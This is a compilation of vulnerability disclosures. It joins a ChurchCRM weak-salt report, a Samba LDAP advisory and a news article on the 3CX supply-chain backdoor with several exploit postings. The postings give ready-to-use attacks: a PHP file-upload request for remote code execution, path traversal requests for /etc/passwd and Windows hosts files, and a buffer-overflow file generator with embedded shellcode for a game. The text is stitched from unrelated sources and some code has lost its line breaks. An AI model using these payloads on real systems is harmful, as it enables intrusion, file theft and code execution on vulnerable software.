The hashing algorithm of ChurchCRM v4.5.3 utilizes a non-random salt value which allows attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords.

**On what page in the application did you find this issue?**

return hash('sha256', $password . $this\->getPersonId());

**On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?**

Windows/xampp

**What browser (and version) are you running?**

Firefox

**What version of PHP is the server running?**

7.4.27

**What version of SQL Server are you running?**

7.4.27

**What version of ChurchCRM are you running?**

4.5.3

**Weak Salt Implementation**

The following report outlines a vulnerability found in the password storage system. The vulnerability arises from the use of a weak salt in the hashing algorithm, which could allow attackers to crack passwords more easily.

Vulnerable Code:

hash('sha256', $password . $this->getPersonId());

Vulnerability Explanation:  
The salt used in the hashing algorithm is generated by the $this->getPersonId() method. However, the method returns an integer value, which is not random or unique for each password. This makes the salt predictable and weak, and could allow attackers to use precomputed hash tables or dictionary attacks to crack the hashed passwords.

Impact:  
The vulnerability could allow an attacker to crack passwords more easily, which could result in unauthorized access to user accounts and sensitive information.

Recommendation:  
To address this vulnerability, it is recommended to use a more secure and unpredictable salt for each password, such as a random value generated for each password. This will make it more difficult for attackers to crack hashed passwords using precomputed hash tables or dictionary attacks.

CVE-2023-26855: Weak Salt Implementation · Issue #6449 · ChurchCRM/CRM

The fix in 4.6.16, 4.7.9, 4.8.4 and 4.9.7 for CVE-2018-10919 Confidential attribute disclosure vi LDAP filters was insufficient and an attacker may be able to obtain confidential BitLocker recovery keys from a Samba AD DC.

**CVE-2023-0614.html:**

\===========================================================
== Subject:     Access controlled AD LDAP attributes can be discovered
==
== CVE ID#:     CVE-2023-0614
==
== Versions:    All Samba releases since Samba 4.0

==
== Summary:     The fix in 4.6.16, 4.7.9, 4.8.4 and 4.9.7 for
                CVE-2018-10919 Confidential attribute disclosure via
                LDAP filters was insufficient and an attacker may be
                able to obtain confidential BitLocker recovery keys
                from a Samba AD DC.

                Installations with such secrets in their Samba AD
                should assume they have been obtained and need
                replacing.
===========================================================

===========
Description
===========

In Active Directory, there are essentially four different classes of
attributes.

 - Secret attributes (such as a user, computer or domain trust
   password) that are never disclosed and are not available to search
   against over LDAP.  This is a hard-coded list, and since Samba 4.8
   these are additionally encrypted in the DB with a per-DB key.

 - Confidential attributes (marked as such in the schema) that have a
   default access restriction allowing access only to the owner of the
   object.

   While a Samba AD Domain makes these attributes available,
   thankfully by default it will not have any of these confidential
   attributes set, as they are only added by clients after
   configuration (typically via a GPO).

   Examples of confidential data stored in Active Directory include
   BitLocker recovery keys, TPM owner passwords, and certificate
   secret keys stored with Credential Roaming.

 - Access controlled attributes (for reads or writes), Samba will
   honour the access control specified in the ntSecurityDescriptor.

 - Public attributes for read.  Most attributes in Active Directory
   are available to read by all authenticated users.

Because the access control rules for a given attribute are not
consistent between objects, Samba implemented access control
restrictions only after matching objects against the filter.

Taking each of the above classes in turn:

 - Secret attributes are prevented from disclosure firstly by
   redaction of the LDAP filter, and secondly by the fact that they
   are still encrypted during filter processing (by default).

 - Confidential and access controlled attributes were subject to an
   attack using LDAP filters.

With this security patch, for attributes mentioned in the search
filter, Samba will perform a per-object access control evaluation
before LDAP filter matching on the attribute, preventing unauthorised
disclosure of the value of (for example) BitLocker recovery keys.

It is not expected that all similar attacks have been prevented, and
it is likely still possible to determine if an object or attribute on
an object is present, but not to obtain the contents.


=============
Further steps
=============

Evidence of an attack will not show up in the logs, except at the
highly verbose level 10, and there is no record as to if a previous
attribute disclosure has taken place.

In addition to updating Samba, it is strongly recommended that steps
be taken to ensure that data that may have been leaked from
confidential or otherwise access-controlled attributes is no longer
useful.

Such steps may include, but are not limited to, re-encrypting
BitLocker encrypted drives, changing TPM passwords, and revoking and
re-issuing certificates that are stored by Credential Roaming (with
new secret keys).


===================
Impacted attributes
===================

In addition to any per-object access control restrictions, the
following attributes in the 2012R2 AD schema have
SEARCH\_FLAG\_CONFIDENTIAL set in the searchFlags by default:

   msDS-IssuerCertificates
   msDS-TransformationRulesCompiled

   Bitlocker:
    msFVE-KeyPackage
    msFVE-RecoveryPassword

   Group Managed Service Accounts:
    msKds-CreateTime
    msKds-DomainID
    msKds-KDFAlgorithmID
    msKds-KDFParam
    msKds-PrivateKeyLength
    msKds-PublicKeyLength
    msKds-RootKeyData
    msKds-SecretAgreementAlgorithmID
    msKds-SecretAgreementParam
    msKds-UseStartTime
    msKds-Version
    (this AD DC feature is not implemented in Samba, and exists only
    in Windows 2012 and later, but could have been replicated to Samba
    in a mixed domain):

   msPKIAccountCredentials
   msPKI-CredentialRoamingTokens
   msPKIDPAPIMasterKeys
   msPKIRoamingTimeStamp
   msTPM-OwnerInformation
   msTPM-OwnerInformationTemp

   unixUserPassword (this value is not used or updated by Samba)

The confidential attributes on your server can be seen (adapt for your
local environment) with:
   
ldbsearch -U$USERNAME -H ldap://$SERVER -b CN=Schema,CN=Configuration,$BASE\_DN '(&(objectClass=attributeSchema)(searchFlags:1.2.840.113556.1.4.803:=128))' lDAPDisplayName

However, please again note that while unlikely, it is possible via the
nTSecurityDescriptor for any attribute to be made access controlled on
any object, and these cases will not be shown by this command.

==================================
Limitations for indexed attributes
==================================

Additionally, due to the nature of our object indexes, Samba must
evaluate these prior to ACL checking, so read access controlled
information should not be stored in indexed attributes.  This will
allow a timing attack.

Again, taking each of the above classes in turn:

 - Secret attributes cannot be indexed or searched for, so have always
   been protected

 - Confidential attributes are further protected, as this patch will
   prevent attributes marked as 'confidential' from being indexed.
   Search results for these will be safer, but slower.  The impacted
   attributes on your server can be seen (adapt for your local
   environment) with:

   ldbsearch -U$USERNAME -H ldap://$SERVER -b CN=Schema,CN=Configuration,$BASE\_DN '(&(objectClass=attributeSchema)(searchFlags:1.2.840.113556.1.4.803:=129))' lDAPDisplayName

   (This will normally return no results and no such attributes have
   this combination by default)
   
 - Access controlled attributes that are also indexed may be subject
   to timing attacks.

   The list of indexed attributes can be seen (adapt for your local
   environment) with:

   ldbsearch -U$USERNAME -H ldap://$SERVER -b CN=Schema,CN=Configuration,$BASE\_DN '(&(objectClass=attributeSchema)(searchFlags:1.2.840.113556.1.4.803:=1))' lDAPDisplayName

==================
Performance impact
==================

As candidate objects are ACL checked before being compared with the
LDAP filter, avoiding this disclosure, Samba's AD DC LDAP read
performance is reduced, with a 20% performance cost in the worst cases
from our existing performance tests.

Further optimisation of the Samba AD DC LDAP server to ameliorate this
impact has been investigated and is technically possible, but is out
of scope for this security release.

==================
Patch Availability
==================

Patches addressing both these issues have been posted to:

    https://www.samba.org/samba/security/

Additionally, Samba $VERSIONS have been issued
as security releases to correct the defect.  Samba administrators are
advised to upgrade to these releases or apply the patch as soon
as possible.

==================
CVSSv3 calculation
==================

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N (7.7)

==========
Workaround
==========

Do not store confidential information in Active Directory, other than
passwords or keys required for AD operation (as these are in the
hard-coded secret attribute list).

=======
Credits
=======

Originally reported by Demi Marie Obenour of Invisible Things Lab.

Patches provided by Joseph Sutton of Catalyst and the Samba team,
reviewed by Andrew Bartlett of Catalyst and the Samba Team.

Advisory by Andrew Bartlett of Catalyst and the Samba Team in
collaboration with Joseph Sutton and Demi Marie Obenour.

==========================================================
== Our Code, Our Bugs, Our Responsibility.
== The Samba Team
==========================================================

CVE-2023-0614: Samba - Security Announcement Archive

"Gopuram" is a backdoor that North Korea's Lazarus Group has used in some campaigns dating back to 2020, some researchers say.

The threat actor — believed to be the Lazarus Group — that recently compromised 3CX's VoIP desktop application to distribute information-stealing software to the company's customers has also dropped a second-stage backdoor on systems belonging to a small number of them.

The backdoor, called "Gopuram," contains multiple modules that the threat actors can use to exfiltrate data; install additional malware; start, stop, and delete services; and interact directly with victim systems. Researchers from Kaspersky spotted the malware on a handful of systems running compromised versions of 3CX DesktopApp.

Meanwhile, some security researchers now say that their analysis shows the threat actors may have exploited a 10-year-old Windows vulnerability (CVE-2013-3900).

**Gopuram: Known Backdoor Linked to Lazarus**

Kaspersky identified Gopuram as a backdoor it has been tracking since at least 2020 when the company found it installed on a system belonging to a cryptocurrency company in Southeast Asia. The researchers at that time found the backdoor installed on a system alongside another backdoor called AppleJeus, attributed to North Korea's prolific Lazarus Group.

In a blog post on April 3, Kaspersky concluded that the attack on 3CX was, therefore, also very likely the work of the same outfit. "The discovery of the new Gopuram infections allowed us to attribute the 3CX campaign to the Lazarus threat actor with medium to high confidence," Kaspersky said.

Kaspersky researcher Georgy Kucherin says the purpose of the backdoor is to conduct cyber espionage. "Gopuram is a second-stage payload dropped by the attackers" to spy on target organizations, he says.

Kaspersky's discovery of second-stage malware adds another wrinkle to the attack on 3CX, a provider of videoconferencing, PBX, and business communication app for Windows, macOS, and Linux systems. The company has claimed that some 600,000 organizations worldwide — with more than 12 million daily users — currently use its 3CX DesktopApp.

**A Major Supply Chain Compromise**

On March 30, 3CX CEO Nick Galea and CISO Pierre Jourdan confirmed that attackers had compromised certain Windows and macOS versions of the software to distribute malware. The disclosure came after several security vendors reported observing suspicious activity associated with legitimate, signed updates of the 3CX DesktopApp binary.

Their investigations showed that a threat actor — now identified as the Lazarus Group — had compromised two dynamic link libraries (DLLs) in the application's installation package added malicious code to them. The weaponized apps ended on user systems via automatic updates from 3CX and also via manual updates.

Once on a system, the signed 3CX DesktopApp executes the malicious installer, which then initiates a series of steps that ends with an information-stealing malware getting installed on the compromised system. Multiple security researchers have noted that only an attacker with a high level of access to 3CX's development or build environment would have been able to introduce malicious code to the DLLs and get away unnoticed. 

3CX has hired Mandiant to investigate the incident and has said it will release more details of what exactly transpired once it has all the details.

**Attackers Exploited a 10-Year-Old Windows Flaw**

Lazarus Group also apparently used a 10-year-old bug to add malicious code to a Microsoft DLL without invalidating the signature. 

In its 2103 vulnerability disclosure, Microsoft had described the flaw as giving attackers a way to add malicious code to a signed executable without invalidating the signature. The company's update for the issue changed how binaries signed with Windows Authenticode are verified. Basically, the update ensured that if someone made changes to an already signed binary, Windows would no longer recognize the binary as signed.

In announcing the update back then, Microsoft also made it an opt-in update, meaning users didn't have to apply the update if they had concerns about the stricter signature verification causing problems in situations where they might have made custom changes to installers. 

"Microsoft was reluctant, for a time, to make this patch official," says Jon Clay, vice president of threat intelligence at Trend Micro. "What is being abused by this vulnerability, in essence, is a scratch-pad space at the end of the file. Think of it like a cookie flag that many applications have been allowed to use, like some Internet browsers."

Brigid O’Gorman, senior intelligence analyst with Symantec's Threat Hunter team, says the company's researchers did see the 3CX attackers appending data to the end of a signed Microsoft DLL. "It worth noting that what gets added to the file is encrypted data that needs something else to turn it into malicious code," O'Gorman says. In this case, the 3CX application sideloads the ffmpeg.dll file, which reads the data appended to the end of the file and then decrypts it into code that calls out to an external command-and-control (C2) server, she notes.

“I think the best advice for organizations at the moment would be to apply Microsoft's patch for CVE-2013-3900 if they have not already done so," O'Gorman says.

Notably, organizations that might have patched the vulnerability when Microsoft first issued an update for it would need to do so again if they have Windows 11. That's because the newer OS undid the effect of the patch, Kucherin and other researchers say.

"CVE-2013-3900 was used by the second-stage DLL in an attempt to hide from security applications that only check against a digital signature for validity," Clay says. Patching would help security products flag the file for analysis, he notes.

William Dormann, senior vulnerability analyst at Analygence says the attackers in the 3CX incident used CVE-2013-3900 to plant shellcode in a digitally signed binary and banked on the malware slipping past analysts because it was digitally signed. "Users who have applied the mitigation for CVE-2013-3900 would not have been protected in any way whatsoever against the 3CX malware on an otherwise default configuration of Windows," he says. No Windows platform includes a fix for CVE-2013-3900 at this point in time. It remains strictly optional. He also notes that with GitHub taking down the payload files attackers had stored on it, there's nothing more users can do to protect against the threat.

A Microsoft spokesman said an attacker would be able to add code to a signed DLL only if they had already compromised the code via a third-party. "As a best practice, we encourage customers to apply all the latest security updates for better protection," the spokesman said. 

"In addition, Defender for Endpoint and Microsoft Defender antivirus can detect and block the domains and files involved with this threat," the spokesman added. Microsoft did not directly address a Dark Reading question on why the company had decided to make the fix for CVE-2013-3900. Instead, the spokesman pointed to Microsoft's original security advisory on the bug. "Regarding CVE-2013-3900 updates specifically, we recommend customers assess their system environment and follow the steps and suggested actions outlined in the security advisory," the spokesman said.

_This story was updated on 04/04 to include comments from Microsoft and analyst Will Dormann._

3CX Breach Widens as Cyberattackers Drop Second-Stage Backdoor

Online Pizza Ordering version 1.0 suffers from a remote shell upload vulnerability.

## Title: Online-Pizza-Ordering-1.0 File-Inclusion-RCE  
## Author: nu11secur1ty  
## Date: 03.30.2023  
## Vendor: https://github.com/oretnom23  
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html  
## Reference: https://portswigger.net/web-security/file-upload

## Description:  
The malicious user can request an account from the administrator of  
this system.  
Then he can use this vulnerability to destroy or get access to all  
accounts of this system, even more, worst than ever.  
The malicious user can upload a very dangerous file on this server,  
and he can execute it via shell.  
The status is CRITICAL.

STATUS: HIGH Vulnerability

[+]Exploit:  
```mysql  
<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

```  
[+]Injection_REQUEST:  
```POST  
POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1  
Host: pwnedhost7.com  
Content-Length: 1050  
Accept: */*  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111  
Safari/537.36  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Origin: http://pwnedhost7.com  
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p  
Connection: close

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="name"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="description"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="status"

on  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="category_id"

4  
------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="price"

------WebKitFormBoundaryt8ceBsdqMkRKDoHX  
Content-Disposition: form-data; name="img"; filename="namebasterd.php"  
Content-Type: application/octet-stream

<?php  
// by nu11secur1ty - 2023  
// Old Name Of The file  
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;

// New Name For The File  
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;

// using rename() function to rename the file  
rename( $old_name, $new_name) ;

?>

------WebKitFormBoundaryt8ceBsdqMkRKDoHX--

```

## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)

## Proof and Exploit:  
[href](https://streamable.com/szb9qy)

## Time spend:  
00:45:00

Online Pizza Ordering 1.0 Shell Upload

GLPI Activity versions prior to 3.1.0 suffer from a local file inclusion vulnerability.

    # Exploit Title: GLPI Activity  v3.1.0 - Authenticated Local File Inclusion on Activity plugin# Date of found: 11 Jun 2022# Application: GLPI Activity < 3.1.0# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/activity# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34125# PoCGET /marketplace/activity/front/cra.send.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: close

GLPI Activity Local File Inclusion

GLPI Manageentities versions prior to 4.0.2 suffer from a local file inclusion vulnerability.

    # ADVISORY INFORMATION# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin# Date of found: 11 Jun 2022# Application: GLPI Manageentities < 4.0.2# Author: Nuri Çilengir # Vendor Homepage: https://glpi-project.org/# Software Link: https://github.com/InfotelGLPI/manageentities# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/# Tested on: Ubuntu 22.04# CVE : CVE-2022-34127# PoCGET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1Host: 192.168.56.113User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

GLPI Manageentities Local File Inclusion

SQL Monitor version 12.1.31.893 suffers from a cross site scripting vulnerability.

    # Exploit Title: SQL Monitor 12.1.31.893 - Cross-Site Scripting (XSS) # Date: [12/21/2022 02:07:23 AM UTC]# Exploit Author: [geeklinuxman@gmail.com]# Vendor Homepage: [https://www.red-gate.com/]# Software Link: [https://www.red-gate.com/products/dba/sql-monitor/]# Version: [SQL Monitor 12.1.31.893]# Tested on: [Windows OS]# CVE : [CVE-2022-47870] [Description] Cross Site Scripting (XSS) in the web SQL monitor login page in Redgate SQL Monitor 12.1.31.893 allows remote attackers to inject arbitrary web Script or HTML via the returnUrl parameter. [Affected Component] affected returnUrl inhttps://sqlmonitor.*.com/Account/Login?returnUrl=&hasAttemptedCookie=True affected A tag under span with "redirect-timeout" id value [CVE Impact] disclosure of the user's session cookie, allowing an attacker tohijack the user's session and take over the account. [Attack Vectors] to exploit the vulnerability, someone must click on the malicious AHTML tag under span with "redirect-timeout" id value [Vendor] http://redgate.com http://sqlmonitor.com https://sqlmonitor.

SQL Monitor 12.1.31.893 Cross Site Scripting

Grand Theft Auto III with Vice City Skin File version 1.1 suffers from a buffer overflow vulnerability.

    # Exploit Title: Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow # Exploit Date: 22.01.2023# Discovered and Written by: Knursoft# Vendor Homepage: https://www.rockstargames.com/# Version: v1.1# Tested on: Windows XP SP2/SP3, 7, 10 21H2# CVE : N/A#1 - Run this python script to generate "evil.bmp" file.#2 - Copy it to [Your Game Path]\skins.#3 - Launch the game and navigate to Options > Player Setup and choose skin"evil".#4 - Buffer Overflow occurs and calc.exe pops up!#msfvenom -p windows/exec CMD="calc.exe"buf =  b""buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64"buf += b"\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28"buf += b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c"buf += b"\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52"buf += b"\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"buf += b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49"buf += b"\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01"buf += b"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75"buf += b"\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b"buf += b"\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"buf += b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"buf += b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00"buf += b"\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5"buf += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c"buf += b"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"buf += b"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65"buf += b"\x00"#any shellcode should work, as it seems there is no badcharsver = 0 #set to 1 if you want it to work on GTA III steam versionesp = b"\xb9\xc5\x14\x21" #mss32.dll jmp espbmphdr =b"\x42\x4D\x36\x00\x03\x00\x00\x00\x00\x00\x36\x00\x00\x00\x28\x00"#generic bmp headerpayload = bmphdrpayload += b"\x90" * 1026if ver == 1:    payload += b"\x90" * 112payload += esppayload += b"\x90" * 20 #paddingpayload += bufwith open("evil.bmp", "wb") as poc:    poc.write(payload)

Grand Theft Auto III Vice City Skin File 1.1 Buffer Overflow

ManageEngine Access Manager Plus version 4.3.0 suffers from a path traversal vulnerability.

    ## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal## Author: nu11secur1ty## Date: 11.22.2023## Vendor: https://www.manageengine.com/## Software: https://www.manageengine.com/privileged-session-management/download.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)## Description:The `pmpcc` cookie is vulnerable to path traversal attacks, enablingread access to arbitrary files on the server.The testing payload..././..././..././..././..././..././..././..././..././..././etc/passwdwas submitted in the pmpcc cookie.The requested file was returned in the application's response.The attacker easy can see all the JS structures of the server and canperform very dangerous actions.## STATUS: HIGH Vulnerability[+] Exploits:```GETGET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1Host: localhost:9292Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Mobile: ?0X-Requested-With: XMLHttpRequestSec-CH-UA-Platform: WindowsReferer: https://localhost:9292/AMPHome.html```[+] Response:```,'js.pmp.helpCertRequest.subcontent10':'The issued certificate ise-mailed to the user who raises the request, the user who closes therequest and also to those e-mail ids specified at the time of closingthe request.','js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username','js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Nextsynchronization is scheduled to run on','js.agent.csharp_Windows_Agent':'C# Windows Agent','js.PassTrixMainTab.in_sec':'Seconds','godaddy.importcsr.selectfileorpastecontent':'Either select a file orpaste the CSR content.','js.connection.colors':'Colors','js.general.ShareToGroups':'Share resource to user groups','js.connection.mapdisk':'Drives','jsp.admin.Support.User_Forums':'User Forums','js.general.CreateResource.Dns_url_check':'Enter a valid URL . Forcloud services (Rackspace and AWS IAM), the DNS name <br>looks like aURL (ex:  https:\/\/identity.api.rackspacecloud.com\/v2.0)','js.admin.RPA_Integration.About':'PAM360 renders bots that seamlesslyintegrate and perfectly fit into the pre-designed and automatedintegrations of the below listed RPA-powered platforms, to simulatethe routine manual password retrieval from the PAM360 vault.','js.discovery.loadhostnamefromfile':'From file','js.AddListenerDetails.Please_enter_valid_implementation_class':'Pleaseenter a valid Implementation Class','js.general.GroupedResources':'Grouped Resources','js.general.SlaveServer':'This operation is not permitted in Secondary Server.','PROCESSID':'Process Id','js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Servicesfetched successfully','assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled','js.commonstr.search':'Search','js.discovery.usercredential_type':'Credential Type','jsp.admin.GeneralSetting.Check_high_availability_status_for':'Checkhigh availability status every <input type=\"text\" class=\"txtbox\"name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"> minutes.','pki.js.help.entervalidnumber':'Please enter a valid number forNumeric Field Default Value.','js.remoteapp.fetch':'Fetch','js.admin.HighAvailability.configured_successfully':'Configured Successfully','js.generalSettings_searchTerm_Password_reset':'Password Reset,Reason for password reset, disable ticket id, waiting time, wait timefor service account password reset, linux unix password reset','letsencrypt.enter.domainnames':'Enter domain names','js.discovery.resourcetype':'Resource Type','js.HomeTab.UserTab':'Set this tab as default view for \'Users\'','js.report.timeline.todate':'Valid To','js.general_Language_Changed_Successfully':'Language Changed Successfully','js.aws.credentials.label':'AWS Credential','auditpurge.helpnote1':'Enter 0 or leave the field blank to disablepurging of audit trails.','js.general.user.orgn_bulkManage':'Manage Organization','js.rolename.SSH_KEY':'Create\/Add key','js.admin.admin.singledbmultiserver.name':'Application Scaling','lets.encrypt.requestreport':'Let\'s Encrypt Requests Report','js.settings.breach_settings.disable_api':'Disable API Access','js.cmd.delete.not_possible':'Command cannot be deleted as it isalready added to the following command set(s).','js.settings.notification.domaincontent':'Notify if domains areexpiring within','js.aws.searchuser':'--Search UserName--','jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketingsystem settings in Admin >> General >> Ticketing System Integration.','js.discovery.port':'Gateway Port','usermanagement.showCertificates':'Show Certificates','js.general.DestinationDirectoryCannotBeEmpty':'Destination directorycannot be empty','js.sshreport.title':'SSH Resource Report','js.encryptionkey.update':'Update','js.aws.regions':'Region','js.settingsTitle1.UserManagement':'User Management','js.passwordPolicy.setRange':'Enforce minimum or maximum password length','js.commonstr.selectResources':'Select Resources','RULENAME':'Rule Name','jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'UserGroup added successfully','js.reports.SSHReports.title':'SSH Reports','js.CommonStr.ValueIsLess':'value is less than 2','js.discovery.discoverystatus':'Discovery Status','js.settings.security_settings.Web_Access':'Web Access','js.general.node_name_cannot_be_empty':'Node name cannot be empty','js.deploy.audit':'Deploy Audit','js.agentdiscovery.msca.title':'Microsoft Certificate Authority','jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominateuser group(s) to exempt from access control.','js.pki.SelectCertificateGroup':'Select Certificate Group(s)','js.admin.HighAvailability.High_Availability_status':'Status','settings.metracker.note0':'Disable ME Tracker if you do not wish toallow ManageEngine to collect product usage details.','SERVICENAME':'Service Name','settings.metracker.note1':'Access Manager Plus server has to berestarted for the changes to take effect.','js.general.NewPinMismatch':'New PIN Mismatch','js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\'','java.ScheduleUtil.minutes':'minutes','js.admin.sdpop_change.tooltip':'Enabling this option will requireyour users to provide valid Change IDs for the validation of passwordaccess requests and other similar operations. Leaving this optionunchecked requires the users to submit valid Request IDs forvalidation.','js.privacy_settings.title.redact':'Redact','js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25resources can be selected','js.aboutpage.websitetitle':'Website','js.customize.NumericField':'Numeric Field','js.please.select.file':'Please select a file to upload.','js.AutoLogon.Remote_connections':'Remote Connections','pki.snmp.port':'Port','java.dashboardutils.TODAY':'TODAY','js.schedule.starttime':'Start Time','js.ssh.keypassphrase':'Passphrase','js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus','js.analytics.tab.ueba.msg4':'guide','js.analytics.tab.ueba.msg5':'to complete the integration. For anyfurther questions, please write to us atpam360-support@manageengine.com.','js.reportType.Option7.UserAuditReport':'Audit Report','js.common.csr':'CSR','js.globalsign.reissue.order':'Reissue Order','js.analytics.tab.ueba.msg6':'Build a platform of expected behaviorfor individual users and entities by mapping different user accounts','js.analytics.tab.ueba.msg7':'Verify actionable reports thatsymbolize compromise with details about actual behavior and expectedbehavior.','js.resources.importcredential':'Import Credentials','js.analytics.tab.ueba.msg1':'The Advanced Analytics module forPAM360, offered via ManageEngine Log360 UEBA, analyzes logs fromdifferent sources, including firewalls, routers, workstations,databases, file servers and cloud services. Any deviation from normalbehavior is classified as a time, count, or pattern anomaly. It thengives actionable insight to the IT Administrator with the use of riskscores, anomaly trends, and intuitive reports.','js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:','js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360instance, download Log360 UEBA from the below link and follow theinstructions in this','js.settingsTitle2.MailServer':'Mail Server','jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'ManagingAMP Encryption Key','settings.unmappedmails.email':'E-mail Address','amp.connection.connection_type':'Connection Type','js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior basedon activity time, count, and pattern.','godaddy.contactphone':'Contact Phone','js.general.HelpDeskIntegrate.ClassSameException':'Class name alreadyimplemented. Implement with some other class.','js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors inWindows devices, SQL servers, FTP servers, and network devices such asrouters, firewalls, and switches.','js.rolename.freeCA.acme':'ACME','digicert.label.dcv.cname':'CNAME Token','js.helpcontent.createuser':'User Creation ','pgpkeys.key.details':'Key Information','js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status','js.HomeTab.TaskAuditView':'Task Audit','pki.js.certs.certGroupsSharedByUserGroups':'Certificate GroupsShared With User Group(s)','js.common.importcsr.format':'(File format should be .csr)','js.notificationpolicy.Submit':'Save','pmp.vct.User_Audit_Configuration':'User Audit Configuration'.........```## 